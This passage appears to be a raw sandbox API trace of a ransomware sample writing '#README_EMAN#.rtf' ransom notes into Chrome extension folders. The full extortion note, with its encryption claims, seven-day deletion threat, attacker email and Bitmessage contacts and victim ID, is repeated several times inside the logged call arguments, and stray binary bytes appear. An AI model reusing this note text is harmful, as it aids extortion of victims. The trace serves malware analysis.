ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nÀv¤Aô\x81éwª1\x9c`\x8fºÊ\x11òÜ\"\x8dP-?Ó\x08", lpUsedDefaultChar=0x0) returned 8717 [0285.300] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0285.300] CloseHandle (hObject=0x294) returned 1 [0285.301] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\#readme_eman#.rtf")) returned 0xffffffff [0285.301] GetLastError () returned 0x2 [0285.301] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0285.301] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.301] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.301] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link 